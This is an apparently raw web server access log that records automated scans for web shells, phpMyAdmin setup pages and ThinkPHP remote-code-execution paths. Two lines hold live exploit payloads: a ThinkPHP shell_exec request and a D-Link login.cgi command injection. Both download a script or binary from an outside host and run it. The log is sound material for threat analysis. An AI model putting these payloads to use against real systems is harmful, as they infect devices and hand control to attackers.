106.13.37.56 - - [01/Feb/2020:15:46:09 +0100] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
106.13.37.56 - - [01/Feb/2020:15:46:32 +0100] "POST /forums/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
212.91.246.72 - - [01/Feb/2020:15:46:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:46:55 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
106.13.37.56 - - [01/Feb/2020:15:46:56 +0100] "GET /help.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:46:56 +0100] "GET /java.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:46:56 +0100] "GET /_query.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:46:56 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:46:58 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:00 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:01 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:01 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:02 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:04 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:04 +0100] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:04 +0100] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:05 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:06 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:08 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:08 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
91.246.109.18 - - [01/Feb/2020:15:47:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:47:08 +0100] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:08 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:09 +0100] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:09 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:10 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:12 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:12 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:12 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:13 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:14 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:16 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:16 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:16 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:16 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:17 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:17 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:17 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:20 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:20 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:21 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:24 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:38 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:40 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:40 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:41 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
212.91.246.72 - - [01/Feb/2020:15:47:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:47:44 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:44 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:44 +0100] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:44 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:45 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:45 +0100] "GET /weathermap/editor.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:45 +0100] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:48 +0100] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:48 +0100] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:48 +0100] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:49 +0100] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:55 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:47:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:09 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:32 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:32 +0100] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:33 +0100] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:34 +0100] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:37 +0100] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:37 +0100] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:37 +0100] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:40 +0100] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:40 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:40 +0100] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:40 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:40 +0100] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:43 +0100] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
212.91.246.72 - - [01/Feb/2020:15:48:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:48:48 +0100] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:48 +0100] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:49 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:50 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:52 +0100] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:52 +0100] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:52 +0100] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:52 +0100] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:54 +0100] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:56 +0100] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:48:56 +0100] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:24 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:27 +0100] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:33 +0100] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:33 +0100] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:33 +0100] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:34 +0100] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:34 +0100] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:37 +0100] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:38 +0100] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
92.46.136.182 - - [01/Feb/2020:15:49:38 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.37.56 - - [01/Feb/2020:15:49:41 +0100] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:41 +0100] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:43 +0100] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:43 +0100] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:43 +0100] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
212.91.246.72 - - [01/Feb/2020:15:49:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:49:44 +0100] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:44 +0100] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:44 +0100] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:45 +0100] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:45 +0100] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:45 +0100] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:45 +0100] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:46 +0100] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:46 +0100] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:47 +0100] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:47 +0100] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:47 +0100] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:47 +0100] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:51 +0100] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:51 +0100] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:51 +0100] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:53 +0100] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:53 +0100] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:54 +0100] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:56 +0100] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:56 +0100] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:49:57 +0100] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.37.56 - - [01/Feb/2020:15:50:00 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:50:20 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
182.167.238.237 - - [01/Feb/2020:15:50:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [01/Feb/2020:15:50:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:50:48 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
